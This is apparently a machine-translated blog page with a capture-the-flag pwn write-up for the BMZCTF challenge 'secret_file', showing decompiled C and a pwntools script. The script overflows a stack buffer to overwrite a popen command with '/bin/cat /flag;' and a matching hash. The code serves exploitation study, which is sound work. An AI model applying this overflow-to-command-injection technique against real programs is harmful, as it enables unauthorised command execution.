当前位置:网站首页>[BMZCTF-pwn] 20-secret_ file
[BMZCTF-pwn] 20-secret_ file
2022-07-03 04:30:00 【Shi Shi Shi Shi Shi Shi Shi Shi Shi Shi Shi Shi Shi Shi Shi Shi】
Problem of overflow in stack
After reading the program, it's over
__int64 __fastcall main(int a1, char **a2, char **a3)
{
char *v3; // rax
unsigned __int8 *v4; // rbp
char *v5; // rbx
__int64 v6; // rcx
char *v7; // rdi
unsigned int v8; // er12
FILE *v9; // rbp
size_t v11; // [rsp+0h] [rbp-308h] BYREF
char *lineptr; // [rsp+8h] [rbp-300h] BYREF
char dest[256]; // [rsp+10h] [rbp-2F8h] BYREF Input plaintext to be encrypted
char v14[27]; // [rsp+110h] [rbp-1F8h] BYREF Initialize the put command
char v15[65]; // [rsp+12Bh] [rbp-1DDh] BYREF Initialize the put sha256 value
_QWORD v16[4]; // [rsp+16Ch] [rbp-19Ch] BYREF
char v17[64]; // [rsp+18Ch] [rbp-17Ch] BYREF Before user input 0x100 Encrypted sha256 value
int v18; // [rsp+1CCh] [rbp-13Ch] BYREF
char s[264]; // [rsp+1D0h] [rbp-138h] BYREF
unsigned __int64 v20; // [rsp+2D8h] [rbp-30h]
v20 = __readfsqword(0x28u);
sub_E60(dest); // md5 Values in v15
v11 = 0LL;
lineptr = 0LL;
if ( getline(&lineptr, &v11, stdin) == -1 )
return 1;
v3 = strrchr(lineptr, 10);
if ( !v3 )
return 1;
*v3 = 0;
v4 = (unsigned __int8 *)v16;
v5 = v17;
strcpy(dest, lineptr);
sub_DD0((__int64)dest, v16, 0x100u); // To the front 0x100 String encryption
do
{
v6 = *v4;
v7 = v5;
v5 += 2;
++v4;
snprintf(v7, 3uLL, "%02x", v6);
}
while ( v5 != (char *)&v18 );
v8 = strcmp(v15, v17);
if ( v8 )
{
puts("wrong password!");
return 1;
}
v9 = popen(v14, "r");
if ( !v9 )
return 1;
while ( fgets(s, 256, v9) )
printf("%s", s);
fclose(v9);
return v8;
}The program first combines a command with md5 Value in v14,v15 It's about . Then the user input value is put into desc It's about (v14 front ). Here, as long as you enter super long v14,v15 Cover can .
from pwn import *
p = process('./pwn')
elf = ELF('./pwn')
context(arch = 'amd64', log_level = 'debug') #
payload = b'A'*(256)+ b'/bin/cat /flag;'.ljust(27, b'#')+b'e075f2f51cad23d0537186cfcd50f911ea954f9c2e32a437f45327f1b7899bbb'
p.sendline(payload)
p.recv()
pause()
边栏推荐
- MongoDB 慢查询语句优化分析策略
- Crazy scientist
- [set theory] inclusion exclusion principle (including examples of exclusion principle)
- Web - Information Collection
- Fcpx template: sweet memory electronic photo album photo display animation beautiful memory
- Dive Into Deep Learning——2.1数据操作&&练习
- Joint set search: merge intervals and ask whether two numbers are in the same set
- [fxcg] market analysis today
- The programmer went to bed at 12 o'clock in the middle of the night, and the leader angrily scolded: go to bed so early, you are very good at keeping fit
- JS realizes the animation effect of text and pictures in the visual area
猜你喜欢
FISCO bcos zero knowledge proof Fiat Shamir instance source code
Jincang KFS data bidirectional synchronization scenario deployment
Integration of Android high-frequency interview questions (including reference answers)
JS realizes lazy loading of pictures
![[nlp] - brief introduction to the latest work of spark neural network](/img/65/35ae0137f4030bdb2b0ab9acd85e16.png)
[nlp] - brief introduction to the latest work of spark neural network
Two points -leetcode-540 A single element in an ordered array
2022 new examination questions for the main principals of hazardous chemical business units and examination skills for the main principals of hazardous chemical business units
Design and implementation of JSP logistics center storage information management system
[NLP]—sparse neural network最新工作简述
Dismantle a 100000 yuan BYD "Yuan". Come and see what components are in it.
随机推荐
redis 持久化原理
vulnhub HA: Natraj
BMZCTF simple_ pop
2022 beautician (intermediate) new version test questions and beautician (intermediate) certificate examination
2022 registration examination for safety production management personnel of hazardous chemical production units and examination skills for safety production management personnel of hazardous chemical
Dive Into Deep Learning——2.1数据操作&&练习
JS realizes lazy loading of pictures
Competitive product analysis and writing
[pat (basic level) practice] - [simple simulation] 1063 calculate the spectral radius
一名外包仔的2022年中总结
Data Lake three swordsmen -- comparative analysis of delta, Hudi and iceberg
有道云笔记
[software testing-6] & Test Management
Why should programmers learn microservice architecture if they want to enter a large factory?
x Problem B
[set theory] set concept and relationship (set family | set family examples | multiple sets)
[set theory] Cartesian product (concept of Cartesian product | examples of Cartesian product | properties of Cartesian product | non commutativity | non associativity | distribution law | ordered pair
How to choose cross-border e-commerce multi merchant system
AWS VPC
[set theory] set operation (Union | intersection | disjoint | relative complement | symmetric difference | absolute complement | generalized union | generalized intersection | set operation priority)